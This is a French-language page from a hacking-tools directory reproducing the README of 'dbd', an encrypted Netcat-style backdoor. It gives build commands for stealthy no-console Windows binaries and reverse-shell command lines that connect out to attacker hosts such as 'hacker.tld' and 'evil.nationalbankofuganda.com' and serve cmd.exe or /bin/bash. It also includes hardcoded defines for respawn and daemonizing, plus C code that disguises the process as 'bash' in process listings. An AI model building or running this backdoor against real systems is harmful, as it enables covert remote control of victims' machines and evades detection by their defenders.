Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
dbd — Backdoor de Durandal | Kitploit
Outils/GitHubGitHub/gitdurandal/dbd
Outils de Chiffrement/DéchiffrementExploitationPost-ExploitationSécurité RéseauTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubgitdurandal/dbd

dbd

Backdoor de Durandal

1523847il y a 10 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôtSite web

d8888b. d8888b. d8888b. 88 8D 88 8D 88 `8D 88 88 88oooY' 88 88 88 88 88~~~b. 88 88 88 .8D 88 8D 88 .8D Y8888D' Y8888P' Y8888D'

#Durandal's Backdoor #Copyright (C) 2013 Kyle Barnthouse [email protected] #dbd est distribué sous licence GNU GPL #Binaire Mipsbe ajouté par Darkerego [https://github.com/darkerego] [(mailto:[email protected])]

###SYNOPSIS

dbd est un clone de Netcat, conçu pour être portable et offrir un chiffrement robuste. Il fonctionne sur les systèmes d'exploitation de type Unix et sous Microsoft Win32. dbd propose un chiffrement AES-CBC-128 + HMAC-SHA1 (par Christophe Devine), l'exécution de programmes (option -e), le choix du port source, la reconnexion continue avec délai, ainsi que quelques autres fonctionnalités pratiques. dbd ne prend en charge que les communications TCP/IP. Le code source et les binaires sont distribués sous licence GNU General Public License.

###COMPILATION

$ make
usage:
  make unix     - Linux, NetBSD, FreeBSD, OpenBSD
  make unix32  - Linux, NetBSD, FreeBSD, OpenBSD 32-bit
  make sunos    - SunOS (Solaris)
  make win32    - native win32 console app (w/ Cygwin + MinGW)
  make win32bg  - create a native win32 no-console app (w/ Cygwin + MinGW)
  make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
  make mingw    - native win32 console app (w/ MinGW MSYS)
  make mingwbg  - native win32 no-console app (w/ MinGW MSYS)
  make mingwbg CFLAGS=-DSTEALTH - stealthy no-console app (w/ MinGW MSYS)
  make cygwin   - Cygwin console app
  make darwin   - Darwin

cross-compile options:
  make mingw-cross    - win32 cross compile (i586-mingw32msvc-gcc)
  make mingwbg-cross  - win32 no-console cross compile (i586-mingw32msvc-gcc)
  make mingwbg-cross CFLAGS=-DSTEALTH - stealthy win32 cross compile
  make unix CROSS_COMPILE=<path/to/toolchain-> - cross compile for any arch

roll up a tarball (move your compiled stuff to binaries/ first:
  make dist     - create tarball with source files, readme, and binaries/

Pour compiler dbd sous un système d'exploitation de type Unix, vous avez besoin de gcc et des outils de développement appropriés. Pour Linux, FreeBSD, NetBSD, OpenBSD (et éventuellement d'autres), tapez :

$ make unix

Pour SunOS/Solaris, tapez :

$ make sunos

Pour compiler dbd sous Microsoft Windows (NT/2K/XP/2K3), vous avez besoin de MinGW+MSYS, ou de Cygwin avec le support de développement complet (le MinGW gcc de Cygwin). Pour compiler une application console Win32 native de dbd sous Cygwin, tapez :

$ make win32

ou, sous MSYS :

$ make mingw

Pour compiler une application sans console (« WinMain ») sous Cygwin, tapez :

$ make win32bg

ou, sous MSYS :

$ make mingwbg

Pour compiler une application console spécifique à Cygwin, tapez :

$make cygwin

Vous souhaiterez peut-être modifier le comportement par défaut de dbd. L'une des choses les plus importantes est de remplacer le secret partagé par défaut par votre propre phrase de passe. Modifiez dbd.h et remplacez-le par vos préférences. Vous pouvez, par exemple, vouloir coder en dur un hôte + un port auquel se connecter si dbd est lancé sans options. Des exemples complets sont fournis dans dbd.h.

###EXEMPLES D'UTILISATION

Avec un peu d'imagination, dbd peut être utilisé pour de nombreuses choses :

Utilisez dbd pour transférer des fichiers en toute sécurité entre deux réseaux :

snafu$ dbd -l -p 12345 -k secret > output.file

fubar$ cat input.file | dbd -k secret snafu 12345

ou depuis win32 :

C:\somedir>type input.fil | dbd -k secret snafu 12345

Utilisez dbd comme un chat simple (mais sécurisé) :

snafu$ dbd -P snafu -Hon fubar 1234

fubar$ dbd -Pfubar -Hon -l -p 1234

Utilisez dbd comme porte dérobée (backdoor) pour les tests d'intrusion :

C:\hacked box>dbdbg.exe -r1800 -q -e cmd.exe hacker.tld 443

ou sous les OS de type Unix :

root@owned# ./dbd -r1800 -Don -e /bin/bash hacker.tld 993

###OPTIONS CODÉES EN DUR

En plus d'utiliser les options de la ligne de commande, vous pouvez coder des variables en dur en utilisant des #define dans dbd.h. Pour ce faire, définissez les variables que vous souhaitez utiliser comme constantes nommées et compilez normalement. Par exemple, si vous vouliez coder en dur un exécutable dbd qui se reconnecterait à « evil.nationalbankofuganda.com » sur le port 995 et exécuterait « /bin/bash », vous pourriez lancer :

root@owned# ./dbd -e /bin/bash evil.nationalbankofuganda.com 995

ou, en utilisant des #define codés en dur, vous pourriez modifier dbd.h :

#define DOLISTEN 0
#define HOST "evil.nationalbankofuganda.com"
#define PORT 995
#define EXECPROG "/bin/bash"
Vous pouvez également définir les options de résurrection (respawn) et de furtivité pour aider à maintenir votre connexion :
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 900
#define QUIET 1
#define DAEMONIZE 1

Cela configurera la connexion pour qu'elle se démonise (« melt » dans le jargon des malwares), n'envoie jamais de sortie vers STDOUT et tente de relancer la connexion toutes les 15 minutes si elle venait à se déconnecter du listener.

###TECHNOLOGIE DE CAMOUFLAGE ROMULIENNE

Entrons maintenant dans le vif du sujet. Une fois que vous êtes un maître dans l'art de coder en dur des options dans votre porte dérobée, vous pouvez utiliser ce qui est sans doute la constante nommée la plus amusante à notre disposition : CLOAK. Pour ce faire, définissez simplement la valeur :

#define CLOAK 1

NOTE : cela ne fonctionne actuellement que sur les compilations *nix. À terme, je prévois d'ajouter la migration/le hooking de processus Win32 afin que ces cibles puissent également recevoir un peu d'amour romulien.

Pour les environnements *nix, cette option nettoie argv[0] et le remplace par la chaîne « bash\0 ». Elle nettoie également toutes les autres argv[] (ce serait ridicule si ps renvoyait « bash -e /bin/bash someremotehost.com 443 », n'est-ce pas ?) J'espère qu'il va sans dire que vous NE POUVEZ PAS UTILISER CETTE OPTION À MOINS DE CODER EN DUR VOS VARIABLES DANS DBD.H. En outre, si vous testez cela sur votre propre système, ce sera amusant de choisir le bon pid à tuer. ;)

N'hésitez pas à utiliser ce nettoyeur dans tout ce sur quoi vous travaillez :

//grab our named constant
int cloak = CLOAK;

//Engage cloaking device
if(cloak)
{
	#ifdef WIN32
	//stub              
	#else
	//change argv[0] to say bash       
	int scrub;
	strncpy((char *)argv[0], "\0", strlen((char *)argv[0]) + 1);
	strcpy((char *)argv[0], "bash\0");    
	for (scrub = 1; scrub < argc; scrub++)
	{                     
		 strncpy((char *)argv[scrub], "\0", strlen((char *)argv[scrub]) + 1);
	}                 
	#endif
}

###AVERTISSEMENT

Ne transmettez pas d'entrée mise en cache (un fichier contenant des commandes ou similaire) à une session « dbd -e » en écoute. « dbd -e » utilise des tubes (pipes) pour transmettre les données entre le programme exécuté et dbd. Les tubes sont utilisés (au lieu de simples descripteurs de fichiers dupliqués en pass-through) en raison du chiffrement entre les tubes et la socket. Afin d'empêcher l'extrémité d'écriture de l'un des tubes de bloquer tout le processus, je l'ai transformée en descripteur non bloquant. Il y a un risque que, lorsqu'une trop grande quantité d'entrée est transmise d'un coup au programme -e, elle soit tronquée (coupée), car le tampon du tube (dans l'OS) ne peut pas contenir toutes les données. Ce problème peut être résolu en rendant dbd multi-threadé par exemple, mais j'éviterai cela le plus longtemps possible pour des raisons de compatibilité.

##COMPILATION CROISÉE

Télécharger l’outil